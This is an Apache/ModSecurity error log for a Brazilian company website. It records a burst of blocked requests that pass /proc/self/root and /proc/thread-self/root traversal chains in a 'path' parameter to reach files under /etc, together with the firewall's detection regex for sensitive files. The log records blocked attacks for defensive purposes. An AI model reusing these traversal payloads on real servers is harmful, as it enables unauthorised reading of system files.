[Mon Mar 16 17:11:12.277311 2026] [:error] [pid 21806:tid 140411674785536] [client 74.7.243.203:59662] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/python"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhj4NSswJuvopo3lOh1CAAAAIg"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 17:11:13.492678 2026] [:error] [pid 14895:tid 140411599251200] [client 74.7.243.203:59670] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/audit"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhj4VajLEzk2WiQ-10ovQAAApE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 17:11:18.651318 2026] [:error] [pid 21805:tid 140411565680384] [client 74.7.243.203:59672] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/ppp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhj5rABkC4fWIHEf8ELJgAAAFU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 17:11:19.986557 2026] [:error] [pid 10772:tid 140411649607424] [client 74.7.243.203:59684] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/ppp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhj5_9ocpUE4ed4uDwI1AAAAgs"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 17:11:22.967629 2026] [:error] [pid 21806:tid 140411658000128] [client 74.7.243.203:47484] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/yum.repos.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhj6tSswJuvopo3lOh1DAAAAIo"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 17:11:24.449766 2026] [:error] [pid 29507:tid 140411557287680] [client 74.7.243.203:47500] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/dracut.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhj7Er9dMAiw-8KANNddQAAARY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 17:11:25.853830 2026] [:error] [pid 15061:tid 140411683178240] [client 74.7.243.203:47510] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/cron.daily"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhj7aTCbgAP5jq5TehCyQAAAsc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 17:11:27.210990 2026] [:error] [pid 29507:tid 140411683178240] [client 74.7.243.203:47520] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/modules-load.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhj70r9dMAiw-8KANNdeQAAAQc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 17:11:28.527136 2026] [:error] [pid 21805:tid 140411716749056] [client 74.7.243.203:47534] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/bash_completion.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhj8LABkC4fWIHEf8ELKgAAAEM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 17:11:29.937041 2026] [:error] [pid 21805:tid 140411649607424] [client 74.7.243.203:47546] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/binfmt.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhj8bABkC4fWIHEf8ELKwAAAEs"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 17:11:31.186251 2026] [:error] [pid 29507:tid 140411741927168] [client 74.7.243.203:41572] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/my.cnf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhj80r9dMAiw-8KANNdgQAAAQA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 17:11:31.643111 2026] [:error] [pid 21805:tid 140411741927168] [client 74.7.228.16:51838] [client 74.7.228.16] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abhj87ABkC4fWIHEf8ELLAAAAEA"]
[Mon Mar 16 17:11:32.476423 2026] [:error] [pid 10651:tid 140411599251200] [client 74.7.243.203:41586] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/wpa_supplicant"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhj9LysWC90G-1nBrBaGwAAAZE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 17:11:34.754766 2026] [:error] [pid 29802:tid 140411607643904] [client 74.7.243.203:41602] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/selinux"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhj9s_BxrYCr4hPDw8ARQAAAdA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 17:11:36.146273 2026] [:error] [pid 15568:tid 140411599251200] [client 74.7.243.203:41604] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/dnsmasq.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhj-KQpVkWug9HeOt9LxAAAA1E"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 17:11:38.559531 2026] [:error] [pid 10651:tid 140411733534464] [client 74.7.243.203:41618] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/yum.repos.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhj-rysWC90G-1nBrBaHwAAAYE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 17:11:40.348678 2026] [:error] [pid 29507:tid 140411716749056] [client 74.7.241.46:35310] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/rpm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhj_Er9dMAiw-8KANNdjAAAAQM"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 17:11:41.076423 2026] [:error] [pid 29507:tid 140411590858496] [client 74.7.243.203:41632] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/cron.weekly"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhj_Ur9dMAiw-8KANNdjQAAARI"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 17:11:42.516699 2026] [:error] [pid 10651:tid 140411641214720] [client 74.7.243.203:40130] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/dracut.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhj_rysWC90G-1nBrBaIwAAAYw"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 17:11:43.876325 2026] [:error] [pid 10772:tid 140411599251200] [client 74.7.243.203:40140] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/bash_completion.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhj__9ocpUE4ed4uDwI1QAAAhE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 17:11:45.045652 2026] [:error] [pid 10772:tid 140411557287680] [client 74.7.243.203:40148] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/dnsmasq.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhkAf9ocpUE4ed4uDwI1wAAAhY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 17:11:46.435425 2026] [:error] [pid 15061:tid 140411624429312] [client 74.7.243.203:40156] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/uwsgi.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhkAqTCbgAP5jq5TehC3gAAAs4"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 17:11:48.995250 2026] [:error] [pid 10772:tid 140411741927168] [client 74.7.243.203:40170] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/modsecurity"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhkBP9ocpUE4ed4uDwI2gAAAgA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
